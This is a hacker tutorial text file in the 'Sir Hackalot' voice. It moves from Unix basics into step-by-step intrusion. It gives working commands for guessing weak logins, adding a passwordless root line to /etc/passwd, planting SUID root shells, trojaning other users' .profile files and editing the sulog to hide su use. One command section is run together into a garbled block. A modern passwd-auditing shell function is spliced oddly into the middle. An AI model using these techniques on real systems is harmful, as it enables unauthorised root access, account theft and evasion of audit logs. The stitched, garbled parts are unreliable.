Several companies use Word Processors, databases, and other things as a user shell, to prevent abuse, and make life easier for unskilled computer operators. Several Medical Hospitals use this kind of shell in Georgia, and fortunately, these second rate programs leave major holes in Unix. Also, a BBS can be run as a shell. Check out Jolnet [312]-301-2100, they give you a choice between a command interpreter, or a BBS as a shell.

When you have a command interpreter, the prompt is usually a: $
when you are a root user the prompt is usually a: #
The variable, PS1, can be set to hold a prompt. For instance, if PS1 is "HI:", your prompt will be: HI:
_____________________________________________________________________________
------------------------
SPecial Characters, ETc:
------------------------
Control-D : End of file. When using mail or a text editor, this will end the message or text file. If you are in the shell and hit control-d you get logged off.
Control-J : On some systems, this is like the enter key.
@ : Is sometimes a "null"
? : This is a wildcard. This can represent a letter.
    If you specified something at the command line like "b?b" Unix would look for bob, bib, bub, and every other letter/number between a-z, 0-9.
* : this can represent any number of characters. If you specified a "hi*" it would use "hit", him, hiiii, hiya, and ANYTHING that starts with hi. "H*l" could be hill, hull, hl, and anything that starts with an H and ends with an L.
[] : This specifies a range. If I did b[o,u,i]b unix would think: bib, bub, bob. If I did: b[a-d]b unix would think: bab, bbb, bcb, bdb. Get the idea? The [], ?, and * are usually used with copy, deleting files, and directory listings.

EVERYTHING in Unix is CASE sensitive. This means "Hill" and "hill" are not the same thing. This allows for many files to be able to be stored, since "Hill" "hill" "hIll" "hiLl", etc. can be different files. So, when using the [] stuff, you have to specify capital letters if any files you are dealing with have capital letters. Most everything is lower case though.

----------------
Commands to use:
----------------
Now, I will rundown some of the useful commands of Unix. I will act as if I were typing in the actual command from a prompt.

ls - this is to get a directory. With no arguments, it will just print out file names in either one column or multi-column output, depending on the ls program you have access to.
     example:
        $ ls
        hithere runme note.text src
        $
     the -l switch will give you extended info on the files.
        $ ls -l
        rwx--x--x sirhack sirh 10990 runme
        and so on....
     the "rwx--x--x" is the file permission. [Explained Later]
     the "sirhack sirh" is the owner of the file/group the file is in. sirhack = owner, sirh = user-group the file is in [explained later]
     the 10990 is the size of the file in bytes.
     "runme" is the file name.
     The format varies, but you should have the general idea.

cat - this types out a file onto the screen. should be used on text files. only use it with binary files to make a user mad [explained later]
     ex:
        $ cat note.txt
        This is a sample text file!
        $

cd - change directory.
     You do it like this: cd /dir/dir1/dir2/dirn. the dir1/etc.... describes the directory name. Say I want to get to the root directory.
     ex:
        $ cd /
        *ok, I'm there.*
        $ ls
        bin sys etc temp work usr
     all of the above are directories, lets say.
        $ cd /usr
        $ ls
        sirhack datawiz prophet src violence par phiber scythian
        $ cd /usr/sirhack
        $ ls
        hithere runme note.text src
        $
     ok, now, you do not have to enter the full dir name. if you are in a directory, and want to get into one that is right there [say "src"], you can type "cd src" [no "/"]. Instead of typing "cd /usr/sirhack/src" from the sirhack dir, you can type "cd src"

cp - this copies a file. syntax for it is "cp fromfile tofile"
        $ cp runme runme2
        $ ls
        hithere runme note.text src runme2
     Full pathnames can be included, as to copy it to another directory.
        $ cp runme /usr/datwiz/runme

mv - this renames a file. syntax "mv oldname newname"
        $ mv runme2 runit
        $ ls
        hithere runme note.text src runit
     files can be renamed into other directories.
        $ mv runit /usr/datwiz/run
        $ ls
        hithere runme note.text src
        $ ls /usr/datwiz
        runme run

pwd - gives current directory
        $ pwd
        /usr/sirhack
        $ cd src
        $ pwd
        /usr/sirhack/src
        $ cd ..
        $ pwd
        /usr/sirhack      [ the ".." means use the name one directory back. ]
        $ cd ../datwiz    [translates to cd /usr/datwiz]
        $ pwd
        /usr/datwiz
        $ cd $home        [goto home dir]
        $ pwd
        /usr/sirhack

rm - delete a file. syntax "rm filename" or "rm -r directory name"
        $ rm note.text
        $ ls
        hithere runme src
        $

write - chat with another user. Well, "write" to another user. syntax: "write username"
        $ write scythian
        scythian has been notified
        Hey Scy! What up??
        Message from scythian on tty001 at 17:32
        hey!
        me: So, hows life?
        scy: ok, I guess.
        me: gotta go finish this text file.
        scy: ok
        me: control-D [to exit program]
        $

who [w,who,whodo] - print who is online
        $ who
        login      term     logontime
        scythian + tty001   17:20
        phiberO  + tty002   15:50
        sirhack  + tty003   17:21
        datawiz  - tty004   11:20
        glitch   - tty666   66:60
        $
     the "who" commands may vary in the information given.
a "+" means you can "write" to their terminal, a "-" means you cannot.man - show a manual page entry. syntax "man command name" This is a help program. If you wanted to know how to use... "who" you'd type $ man who WHO(1) xxx...... and it would tell you.stty - set your terminal characteristics. You WILL have to do "man stty" since each stty is different, it seems like. an example would be: $ stty -parenb to make the data params N,8,1. A lot of Unixes operate at e,7,1 by default.sz,rz - send and recieve via zmodemrx,sx - send / recieve via xmodemrb,sb - send via batch ymodem. These 6 programs may or may not be on a unix.umodem - send/recieve via umodem. $ sz filename ready to send... $ rz filename please send your file.... ...etc..ed - text editor. Usage "ed filename" to create a file that doesn't exist, just enter in "ed filename" some versions of ed will give you a prompt, such as "*" others will not $ ed newtext 0 * a This is line 1 This is line 2 [control-z] * 1 [to see line one] This is line 1 * a [keep adding] This is line 3 [control-z] *0a [add after line 0] This is THE first line [control-z] 1,4l This is THE first line This is line 1 This is line 2 This is line 3 * w 71 * q $ The 71 is number of bytes written. a = append l = list # = print line number w - write l fname = load fname s fname = save to fname w = write to current file q = quitmesg - turn write permissions on or off to your terminal (allow chat) format "mesg y" or "mesg n"cc - the C compiler. don't worry about this one right now.chmod - change mode of a file. Change the access in other words. syntax: "chmod mode filename" $ chmod a+r newtext Now everyone can read newtext. a = all r = read. This will be explained further in the File System section.chown - change the owner of a file. syntax: "chown owner filename" $ chown scythian newtext $chgrp - change the group [explained later] of a file. syntax: "chgrp group file" $ chgrp root runme $finger - print out basic info on an account. 
Format: finger username

grep - search for patterns in a file. syntax: "grep pattern file"

     $ grep 1 newtext
     This is Line 1
     $ grep THE newtext
     This is THE first line
     $ grep "THE line 1" newtext
     $

mail - This is a very useful utility. Obviously, you already know what it is by its name. There are several MAIL utilities, such as ELM, MUSH and MSH, but the basic "mail" program is called "mail". The usage is: "mail username@address" or "mail username" or "mail" or "mail addr1!addr2!addr3!user"

"mail username@address" - This is used to send mail to someone on another system, which is usually another UNIX, but some DOS machines and some VAX machines can receive Unix Mail. When you use "mail user@address" the system you are on MUST have a "smart mailer" [known as smail], and must have what we call system maps. The smart mailer will find the "address" part of the command and expand it into the full pathname usually. It could look like this:

     mail phiber@optik

then look like this to the computer:

     mail sys1!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber

Do not worry about it, I was merely explaining the principle of the thing. Now, if there is no smart mailer online, you'll have to know the FULL path name of the person you wish to mail to. For instance, I want to mail to.. phiber. I'd do this if there were no smart mailer:

     $ mail sys!unisys!pacbell!sbell!sc1!att.com!sirhacksys!optik!phiber
     Hey Guy. Whats up? Well, gotta go. Nice long message huh?
     [control-D]
     $

Then, when he got it, there would be about 20 lines of information, with like a post mark from every system my message went thru, and the "from" line would look like so:

From optik!sirhacksys!att.com!sc1!sbell!pacbell!unisys!sys!sirhack

Now, for local mailing, just type in "mail username" where username is the login you want to send mail to. Then type in your message. Then end it with a control-D.

To read YOUR mail, just type in mail. IE:

     $ mail
     From scythian ............
     To sirhack ............
     Subject: Well....
     Arghhh!
     ?
The dots represent omitted crap. Each Mail program makes its own headings. That ? is a prompt. At this prompt I can type:

     d - delete
     f username - forward to username
     w fname - write message to a file named fname
     s fname - save message with header into file
     q - quit / update mail
     x - quit, but don't change a thing
     m username - mail to username
     r - reply
     [enter] - read next message
     + - go forward one message
     - : go back one
     h - print out message headers that are in your mailbox.

There are others, to see them, you'd usually hit '?'.

--------

If you send mail to someone not on your system, you will have to wait longer for a reply, since it is just as a letter. A "postman" has to pick it up. The system might call out, and use UUCP to transfer mail. Usually, uucp accounts are no good to one, unless you have uucp available to intercept mail.

ps - process. This command allows you to see what you are actually doing in memory. Every time you run a program, it gets assigned a Process Id number (PID), for accounting purposes, and so it can be tracked in memory, as well as shut down by you, or root. usually, the first thing in a process list given by "ps" is your shell name. Say I was logged in under sirhack, using the shell "csh" and running "watch scythian". The watch program would go into the background, meaning I'd still be able to do things while it was running:

     $ ps
     PID TTY NAME
     122 001 ksh
     123 001 watch
     $

     That is a shortened PS. That is the default listing [a brief one]. The TTY column represents the "tty" [i/o device] that the process is being run from. This is only useful really if you are using layers (don't worry) or more than one person is logged in with the same account name. Now, "ps -f" would give a full process listing on yourself, so instead of seeing just plain ole "watch" you'd most likely see "watch scythian"

kill - kill a process. This is used to terminate a program in memory obviously.
You can only kill processes you own [ones you started], unless you are root, or your EUID is the same as the process you want to kill. (Will explain euid later). If you kill the shell process, you are logged off. By the same token, if you kill someone else's shell process, they are logged off. So, if I said "kill 122" I would be logged off. However, kill only sends a signal to UNIX telling it to kill off a process. If you just use the syntax "kill pid" then UNIX kills the process WHEN it feels like it, which may be never. So, you can specify urgency! Try "kill -num pid". Kill -9 pid is a definite kill almost instantly. So if I did this:

     $ kill 122
     $ kill 123
     $ ps
     PID TTY NAME
     122 001 ksh
     123 001 watch
     $ kill -9 123
     [123]: killed
     $ kill -9 122
     garbage
     NO CARRIER

Also, you can do "kill -1 0" to kill your shell process to log yourself off. This is useful in scripts (explained later).

-------------------
Shell Programmin'
-------------------

Shell Programming is basically making a "script" file for the standard shell, being sh, ksh, csh, or something on those lines. It's like an MSDOS batch file, but more complex, and more flexible. This can be useful in one aspect of hacking.

First, let's get into variables. Variables obviously can be assigned values. These values can be string values, or numeric values.

number=1

     That would assign 1 to the variable named "number".

string=Hi There
or
string="Hi There"

     Both would assign "Hi there" to a variable.

     Using a variable is different though. When you wish to use a variable you must precede it with a dollar ($) sign. These variables can be used as arguments in programs. When I said that scripts are like batch files, I meant it. You can enter in any name of a program in a script file, and it will execute it. Here is a sample script.

counter=1
arg1="-uf"
arg2="scythian"
ps $arg1 $arg2
echo $counter

     That script would translate to "ps -uf scythian" then would print "1" after that was finished.
ECHO prints something on the screen whether it be numeric, or a string constant.

Other Commands / Examples:

read - reads something into a variable. format : read variable . No dollar sign is needed here! If I wanted to get someone's name, I could put:

echo "What is your name?"
read hisname
echo Hello $hisname

     What is your name?
     Sir Hackalot
     Hello Sir Hackalot

     Remember, read can read numeric values also.

trap - This can watch for someone to use the interrupt character. (Ctrl-c)
     format: trap "command ; command ; command ; etc.."

Example:
     trap "echo 'Noway!! You are not getting rid of me that easy' ; echo 'You gotta see this through!'"

     Now, if I hit control-c during the script after this statement was executed, I'd get:

     Noway!! You are not getting rid of me that easy
     You gotta see this through!

exit : format : exit [num]. This exits the shell [quits] with return code of num.

-----
CASE
-----

Case execution is like a menu choice deal. The format of the command or structure is :

     case variable in
     1) command;
        command;;
     2) command;
        command;
        command;;
     *) command;;
     esac

Each part can have any number of commands. The last command however must have a ";;". Take this menu:

     echo "Please Choose:"
     echo "(D)irectory (L)ogoff (S)hell"
     read choice
     case $choice in
     D) echo "Doing Directory...";
        ls -al ;;
     L) echo Bye;
        kill -1 0;;
     S) exit;;
     *) echo "Error! Not a command";;
     esac

The esac marks the end of a case function. It must be after the LAST command.

Loops
-----

Ok, loops. There are two loop functions. the for loops, and the repeat.

repeat looks like this: repeat something somethin1 somethin2

this would repeat a section of your script for each "something". say i did this:

     repeat scythian sirhack prophet

I may see "scythian" then sirhack then prophet on my screen.

The for loop is defined as

     "for variable in something
      do
      ..
      ..
      done"

an example:

     for counter in 1 2 3
     do
     echo $counter
     done

That would print out 1 then 2 then 3.

Using TEST
----------

The format: Test variable option variable

The options are:
-eq   =
-ne   <> (not equal)
-gt   >
-lt   <
-ge   >=
-le   <=

for strings its: = for equal, != for not equal.

If the condition is true, a zero is returned. Watch:

     test 3 -eq 3

that would be test 3 = 3, and 0 would be returned.

EXPR
----

This is for numeric functions. You cannot simply type in

echo 4 + 5

and get an answer most of the time. you must say:

expr variable [or number] operator variable2 [or number]

the operators are:
+ add
- subtract
* multiply
/ divide
^ - power (on some systems)

example :
     expr 4 + 5
     var=`expr 4 + 5`

var would hold 9.

On some systems, expr sometimes prints out a formula. I mean, 22+12 is not the same as 22 + 12. If you said expr 22+12 you would see:

     22+12

If you did expr 22 + 12 you'd see:

     34

SYSTEM VARIABLES
----------------

These are variables used by the shell, and are usually set in the system wide .profile [explained later].

HOME - location of your home directory.

PS1 - The prompt you are given. usually $ . On BSD it's usually &

PATH - This is the search path for programs. When you type in a program to be run, it is not in memory; it must be loaded off disk. Most commands are not in Memory like MSDOS. If a program is on the search path, it may be executed no matter where you are. If not, you must be in the directory where the program is. A path is a set of directories basically, separated by ":"'s. Here is a typical search path:

     :/bin:/etc:/usr/lbin:$HOME:

When you tried to execute a program, Unix would look for it in /bin, /etc, /usr/lbin, and your home directory, and if it's not found, an error is spewed out. It searches directories in ORDER of the path. SO if you had a program named "sh" in your home directory, and typed in "sh", EVEN if you were in your home dir, it would execute the one in /bin. So, you must set your paths wisely.
Public access Unixes do this for you, but systems you may encounter may have no path set.

TERM - This is your terminal type. UNIX has a library of functions called "CURSES" which can take advantage of any terminal, provided the escape codes are found. You must have your term set to something if you run screen oriented programs. The escape codes/names of terms are found in a file called TERMCAP. Don't worry about that. just set your term to ansi or vt100. CURSES will let you know if it cannot manipulate your terminal emulation.

-------------------
The C compiler
-------------------

This Will be BRIEF. Why? Because if you want to learn C, go buy a book. I don't have time to write another text file on C, for it would be huge. Basically, most executables are programmed in C. Source code files on unix are found as filename.c . To compile one, type in "cc filename.c". Not all C programs will compile, since they may depend on other files not there, or are just modules. If you see a thing called "makefile" you can usually type in just "make" at the command prompt, and something will be compiled, or be attempted to compile. When using make or CC, it would be wise to use the background operand since compiling sometimes takes for ever. IE:

     $ cc login.c&
     [1234]
     $

(The 1234 was the process # it got identified as).

_____________________________________________________________________________

---------------
The FILE SYSTEM
---------------

This is an instrumental part of UNIX. If you do not understand this section, you'll never get the hang of hacking Unix, since a lot of Pranks you can play, and things you can do to "raise your access" depend on it.

First, Let's start out by talking about the directory structure.
It is basically a Hierarchy file system, meaning, it starts out at a root directory and expands, just as MSDOS, and possibly AmigaDos.

Here is a Directory Tree of sorts: (d) means directory

                    / (root dir)
          --------------------
          bin (d)        usr (d)
               ----^--------------------
          sirhack(d)   scythian (d)   prophet (d)
          src (d)

Now, this particular system contains the following directories:

/
/bin
/usr
/usr/sirhack
/usr/sirhack/src
/usr/scythian
/usr/prophet

Hopefully, you understood that part, and you should. Everything spawns from the root directory.

o File Permissions!
------------------

Now, this is really the biggie. File Permissions. It is not that hard to understand file permissions, but I will explain them deeply anyway.

OK, now you must think of user groups as well as user names. Everyone belongs to a group. at the $ prompt, you could type in 'id' to see what group you are in. Ok, groups are used to allow people access certain things, instead of just having one person controlling/having access to certain files. Remember also, that Unix looks at someone's UID to determine access, not user name.

Ok. File permissions are not really that complicated. Each file has an owner. This OWNER is usually the one who creates the file, either by copying a file or just by plain editing one. The program CHOWN can be used to give someone ownership of a file. Remember that the owner of a file must be the one who runs CHOWN, since he is the only one that can change the permissions of a file. Also, there is a group owner, which is basically the group that you were in when the file was created. You would use chgrp to change the group a file is in.

Now, Files can have Execute permissions, read permissions, or write permission. If you have execute permission, you know that you can just type in the name of that program at the command line, and it will execute.
If you have read permission on a file, you can obviously read the file, or do anything that reads the file in, such as copying the file or cat[ing] it (Typing it). If you do NOT have access to read a file, you can't do anything that requires reading in the file. This is the same respect with write permission. Now, all the permissions are arranged into 3 groups. The first is the owner's permissions. He may have the permissions set for himself to read and execute the file, but not write to it. This would keep him from deleting it. The second group is the group permissions. Take an elongated directory for an example:

     $ ls -l runme
     r-xrwxr-- sirhack root 10990 March 21 runme

ok. Now, "root" is the groupname this file is in. "sirhack" is the owner. Now, if the group named 'root' has access to read, write and execute, they could do just that. Say .. Scythian came across the file, and was in the root user group. He could read, write or execute the file. Now, say datawiz came across it, but was in the "users" group. The group permissions would not apply to him, meaning he would have no permissions, so he couldn't touch the file, right? Sorta. There is a third group of permissions, and this is the "other" group. This means that the permissions in the "other" group apply to everyone but the owner, and the users in the same group as the file.

Look at the directory entry above. the r-xrwxr-- is the permissions line. The first three characters are the permissions for the owner (r-x). The "r-x" translates to "Read and execute permissions, but no write permissions". The second set of three, r-xRWXr-- (the ones in capital letters) are the group permissions. Those three characters mean "Read, write, and execution allowed". The 3rd set, r-xrwxR-- is the permissions for everyone else. It means "Reading allowed, but nothing else". A directory would look something like this:

     $ ls -l
     drwxr-xr-x sirhack root 342 March 11 src

A directory has a "d" at the beginning of the permissions line.
Now, the owner of the directory (sirhack) can read from the directory, write in the directory, and execute programs from the directory. The root group and everyone else can only read from the directory, and execute off the directory. So, If I changed the directory to be executable only, this is what it would look like:

     $ chmod go-r src
     $ ls
     drwx--x--x sirhack root 342 March 11 src

Now, if someone went into the directory besides "sirhack", they could only execute programs in the directory. If they did an "ls" to get a directory of src, when they were inside src, it would say "cannot read directory". If there is a file that is readable in the directory, but the directory is not readable, it is sometimes possible to read the file anyway.

If you do not have execute permissions in a directory, you won't be able to execute anything in the directory, most of the time.

_____________________________________________________________________________

--------------
Hacking:
--------------

The first step in hacking a UNIX is to get into the operating system by finding a valid account/password. The object of hacking is usually to get root (full privileges), so if you're lucky enough to get in as root, you need not read anymore of this hacking phile, and get into the "Having Fun" Section. Hacking can also be just to get other's accounts also.

Getting IN
----------

The first thing to do is to GET IN to the Unix. I mean, get past the login prompt. That is the very first thing. When you come across a UNIX, sometimes it will identify itself by saying something like,

"Young INC. Company UNIX"

or Just

"Young Inc. Please login"

Here is where you try the defaults I listed. If you get in with those you can get into the more advanced hacking (getting root). If you do something wrong at login, you'll get the message

"login incorrect"

This was meant to confuse hackers, or keep them wondering. Why? Well, you don't know if you've entered an account that does not exist, or one that does exist, and got the wrong password.
If you login as root and it says "Not on Console", you have a problem. You have to login as someone else, and use SU to become root.

Now, this is where you have to think. If you cannot get in with a default, you are obviously going to have to find something else to login as. Some systems provide a good way to do this by allowing the use of command logins. These are ones which simply execute a command, then logoff. However, the commands they execute are usually useful. For instance there are three common command logins that tell you who is online at the present time. They are:

     who
     rwho
     finger

If you ever successfully get one of these to work, you can write down the usernames of those online, and try to logon as them. Lots of unsuspecting users use their login name as their password. For instance, the user "bob" may have a password named "bob" or "bob1". This, as you know, is not smart, but they don't expect a hacking spree to be carried out on them. They merely want to be able to login fast.

If a command login does not exist, or is not useful at all, you will have to brainstorm. A good thing to try is to use the name of the unix that it is identified as. For instance, Young INC's Unix may have an account named "young"

     Young, INC. Please Login.
     login: young
     UNIX SYSTEM V REL 3.2
     (c)1984 AT&T..
     ..
     ..
     ..

Some unixes have an account open named "test". This is also a default, but surprisingly enough, it is sometimes left open. It is good to try to use it. Remember, brainstorming is the key to a unix that has no apparent defaults open. Think of things that may go along with the Unix. type in stuff like "info", "password", "dial", "bbs" and other things that may pertain to the system. "att" is present on some machines also.

ONCE INSIDE -- SPECIAL FILES
----------------------------

There are several files that are very important to the UNIX environment. They are as follows:

/etc/passwd - This is probably the most important file on a Unix. Why?
well, basically, it holds the valid usernames/passwords. This is important since only those listed in the passwd file can login, and even then some can't (will explain). The format for the passwordfile is this:

username:password:UserID:GroupID:description(or real name):homedir:shell

Here are two sample entries:

sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh

In the first line, sirhack is a valid user. The second field, however, is supposed to be a password, right? Well, it is, but it's encrypted with the DES encryption standard. the part that says "&a,Ty" may include a date after the comma (Ty) that tells unix when the password expires. Yes, the date is encrypted into two alphanumeric characters (Ty).

In the Second example, the demo account has no password. so at Login, you could type in:

login: demo
UNIX system V
(c)1984 AT&T
..
..

But with sirhack, you'd have to enter a password. Now, the password file is great, since a lot of times, you'll be able to browse through it to look for unpassworded accounts. Remember that some accounts can be restricted from logging in, as such:

bin:*:2:2:binaccount:/bin:/bin/sh

The '*' means you won't be able to login with it. Your only hope would be to run an SUID shell (explained later).

A note about the DES encryption: each unix makes its own unique "keyword" to base encryption off of. Most of the time it's just random letters and numbers. It's chosen at installation time by the operating system.

Now, decrypting DES encrypted things ain't easy. It's pretty much impossible. Especially decrypting the password file (decrypting the password field within the password file to be exact). Always beware a hacker who says he decrypted a password file. He's full of shit. Passwords are never decrypted on unix, but rather, a system call is made to a function called "crypt" from within the C language, and the string you enter as the password gets encrypted, and compared to the encrypted password.
If they match, you're in. Now, there are password hackers, but they do not decrypt the password file, but rather, encrypt words from a dictionary and try them against every account (by crypting/comparing) until it finds a match (later on!). Remember, few, if none, have decrypted the password file successfully.

/etc/group - This file contains the valid groups. The group file is usually defined as this:

     groupname:password:groupid:users in group

     Once again, passwords are encrypted here too. If you see a blank in the password entry you can become part of that group by using the utility "newgrp". Now, there are some cases in which even groups with no password will allow only certain users to be assigned to the group via the newgrp command. Usually, if the last field is left blank, that means any user can use newgrp to get that group's access. Otherwise, only the users specified in the last field can enter the group via newgrp.

     Newgrp is just a program that will change the current group id you are logged on under to the one you specify. The syntax for it is:

     newgrp groupname

     Now, if you find a group unpassworded, and use newgrp to enter it, and it asks for a password, you are not allowed to use the group. I will explain this further in The "SU & Newgrp" section.

/etc/hosts - this file contains a list of hosts it is connected to thru a hardware network (like an x.25 link or something), or sometimes just thru UUCP. This is a good file when you are hacking a large network, since it tells you systems you can use with rsh (Remote Shell, not restricted shell), rlogin, and telnet, as well as other ethernet/x.25 link programs.

/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in several directories, but it is usually in /usr/adm. This file is what it sounds like. It's a log file, for the program SU. What it is for is to keep a record of who uses SU and when.
whenever you use SU, your best bet would be to edit this file if possible, and I'll tell you how and why in the section about using "su".

/usr/adm/loginlog
or /usr/adm/acct/loginlog - This is a log file, keeping track of the logins. Its purpose is merely for accounting and "security review". Really, sometimes this file is never found, since a lot of systems keep the logging off.

/usr/adm/errlog
or errlog - This is the error log. It could be located anywhere. It keeps track of all serious and even not so serious errors. Usually, it will contain an error code, then a situation. the error code can be from 1-10, the higher the number, the worse the error. Error code 6 is usually used when you try to hack. "login" logs your attempt in errlog with error code 6. Error code 10 means, in a nutshell, "SYSTEM CRASH".

/usr/adm/culog - This file contains entries that tell when you used cu, where you called and so forth. Another security thing.

/usr/mail/ - this is where the program "mail" stores its mail. to read a particular mailbox, so they are called, you must be that user, in the user group "mail" or root. each mailbox is just a name. for instance, if my login was "sirhack" my mail file would usually be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually. Will get into this later.

/etc/shadow - A "shadowed" password file. Will talk about this later.

-- The BIN account --

Well, right now, I'd like to take a moment to talk about the account "bin". While it is only a user level account, it is very powerful. It is the owner of most of the files, and on most systems, it owns /etc/passwd, THE most important file on a unix. See, the bin account owns most of the "bin" (binary) files, as well as others used by the binary files, such as login.
Now, knowing what you know about file permissions, if bin owns the passwd file, you can edit passwd and add a root entry for yourself. You could do this via the edit command:

$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$

Then, you could say: exec login, then you could login as sirhack, and you'd be root.

/\/\/\/\/\/\/\/\/
Hacking..........
/\/\/\/\/\/\/\/\/

--------------
Account Adding
--------------

There are other programs that will add users to the system, instead of ed. But most of these programs will NOT allow a root level user to be added, or anything less than a UID of 100. One of these programs is named "adduser". Now, the reason I have stuck this little section in, is for those who want to use a unix for something useful. Say you want a "mailing address". If the unix has uucp on it, or is a big college, chances are, it will do mail transfers. You'll have to test the unix by trying to send mail to a friend somewhere, or just mailing yourself. If the mailer is identified as "smail" when you mail yourself (the program name will be imbedded in the message) that probably means that the system will send out UUCP mail. This is a good way to keep in contact with people.

Now, this is why you'd want a semi-permanent account. The way to achieve this is by adding an account similar to those already on the system. If all the user-level accounts (UID >= 100) are three letter abbreviations, say "btc" for Bill The Cat, or "brs" for bill ryan smith, add an account via adduser, and make a name like sally jane marshall or something (they don't expect hackers to put in female names) and have the account named sjm. See, in the account description (like Mr. Hackalot above), that is where the real name is usually stored. So, sjm might look like this:

     sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh

Of course, you will password protect this account, right? Also, group id's don't have to be above 100, but you must put the account into one that exists.
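Seen from the administrator's side, the /etc/passwd fields described above can be checked mechanically. The shell function below is an added example, not part of the original text: it flags empty password fields, extra UID 0 accounts and shared UIDs. The sample input reuses the entries quoted on this page plus a constructed root line and a constructed malformed line, and the finding names are made up for the example.

```shell
#!/bin/sh
# Added example: audit passwd-format text for the weaknesses described above.
# Assumes the classic seven-field layout with the password hash in field 2,
# as shown on this page.

# Constructed sample. The bin, sirhack, demo, sjm and sirhak lines reuse the
# entries quoted on this page; the root line and the short last line are made up.
SAMPLE_PASSWD='root:constructedhash1:0:0:Super User:/:/bin/sh
bin:*:2:2:binaccount:/bin:/bin/sh
sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh
sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
sirhak::0:0:Mr. Hackalot:/:/bin/sh
half:entry'

# audit_passwd [FILE...]: read passwd-format lines (stdin if no FILE is given)
# and print one finding per line, in input order.
audit_passwd() {
    awk -F: '
        /^[ \t]*$/ { next }                      # skip blank lines
        NF != 7 || $3 !~ /^[0-9]+$/ {            # wrong field count or bad UID
            print "MALFORMED line " NR
            next
        }
        {
            uid = $3 + 0
            # An empty second field means the account needs no password.
            if ($2 == "")
                print "EMPTY_PASSWORD " $1
            # Any UID 0 entry is root-equivalent, whatever its name.
            if (uid == 0 && $1 != "root")
                print "UID0_NOT_ROOT " $1
            # Access checks use the UID, so two names with one UID are one user.
            if (uid in owner)
                print "DUPLICATE_UID " $1 " shares " uid " with " owner[uid]
            else
                owner[uid] = $1
        }
    ' "$@"
}

# Stand-alone run on the constructed sample.
printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
```

On a real system the same function can be pointed at the password file directly, for example from a nightly job that mails any output to the administrator.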
Now, once you login with this account, the first thing you'd want to do is execute "passwd" to set a password up. If you don't, chances are someone else 'll do it for you (Then you'll be SOL).

-------------------
Set The User ID
-------------------

This is probably one of the most used schemes. Setting up a "UID-Shell". What does this mean? Well, it basically means you are going to set the user-bit on a program. The program most commonly used is a shell (csh, sh, ksh, etc). Why? Think about it: You'll have access to whatever the owner of the file does. A UID shell sets the user-ID of the person who executes it to the owner of the program. So if root owns a uid shell, then you become root when you run it. This is an alternate way to become root.

Say you get in and modify the passwd file and make a root level account unpassworded, so you can drop in. Of course, you almost HAVE to get rid of that account or else it WILL be noticed eventually. So, what you would do is set up a regular user account for yourself, then, make a uid shell. Usually you would use /bin/sh to do it. After adding the regular user to the passwd file, and setting up his home directory, you could do something like this:

(assume you set up the account: shk)

     # cp /bin/sh /usr/shk/runme
     # chmod a+s /usr/shk/runme

That's all there would be to it. When you logged in as shk, you could just type in:

     $ runme
     #

See? You'd then be root. Here is a thing to do:

$ id
uid=104(shk) gid=50(user)
$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID. UID-shells only set the effective userid, not the real user-id. But, the effective user id over-rides the real user id. Now, you can, if you wanted to just be annoying, make the utilities suid to root. What do I mean? For instance, make 'ls' a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
........
etc crap

Ls would then be able to pry into ANY directory. If you did the same to "cat" you could view any file. If you did it to rm, you could delete any file.
If you did it to 'ed', you could edit any file (nifty!), anywhere on the system (usually).

How do I get root?
------------------

Good question indeed. To make a program set the user-id shell to root, you have to be root, unless you're lucky. What do I mean? Well, say you find a program that sets the user-id to root. If you have access to write to that file, guess what? you can copy over it, but keep the uid bit set. So, say you see that the program chsh is setting the user id to root. You can copy /bin/sh over it.

$ ls -l
rwsrwsrws root other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh
#

See? That is just one way. There are others, which I will now talk about.

More on setting the UID
-----------------------

Now, the generic form for making a program set the User-ID bit is to use this command:

chmod a+s file

Where 'file' is a valid existing file. Now, only those who own the file can set the user ID bit. Remember, anything YOU create, YOU own, so if you copy the /bin/sh, the one you are logged in as owns it, or IF the UID is set to something else, the New UID owns the file. This brings me to BAD file permissions.

II. HACKING : Bad Directory Permissions

Now, what do I mean for bad directory permissions? Well, look for files that YOU can write to, and above all, DIRECTORIES you can write to. If you have write permissions on a file, you can modify it. Now, this comes in handy when wanting to steal someone's access. If you can write to a user's .profile, you are in business. You can have that user's .profile create a suid shell for you to run when You next logon after the user. If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

Now, when the user next logs on, the .profile will create .runme which will set your ID to the user whose .profile you changed.
Ideally, you'll go back in and zap those lines after the suid is created, and you'll create a suid somewhere else, and delete the one in his dir. The .runme will not appear in the user's REGULAR directory list, it will only show up if he does "ls -a" (or ls with a -a combination), because, the '.' makes a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused methods of gaining more power on a unix. The above could be done in C via the system() command, or by just plain using open(), chmod(), and the like.

 * Remember to check and see if the root user's profile is writeable *
 * it is located at /.profile (usually) *

The BEST thing that could happen is to find a user's directory writeable by you. Why? well, you could replace all the files in the directory with your own devious scripts, or C trojans. Even if a file is not writeable by you, you can still overwrite it by deleting it. If you can read various files, such as the user's .profile, you can make a self deleting trojan as so:

 $ cp .profile temp.pro
 $ ed .profile
 1234
 ? a
 cp /bin/sh .runme
 chmod a+x .runme
 chmod a+s .runme
 mv temp.pro .profile
 (control-d)
 ? w
 [another number]
 ? q
 $ chown that_user temp.pro

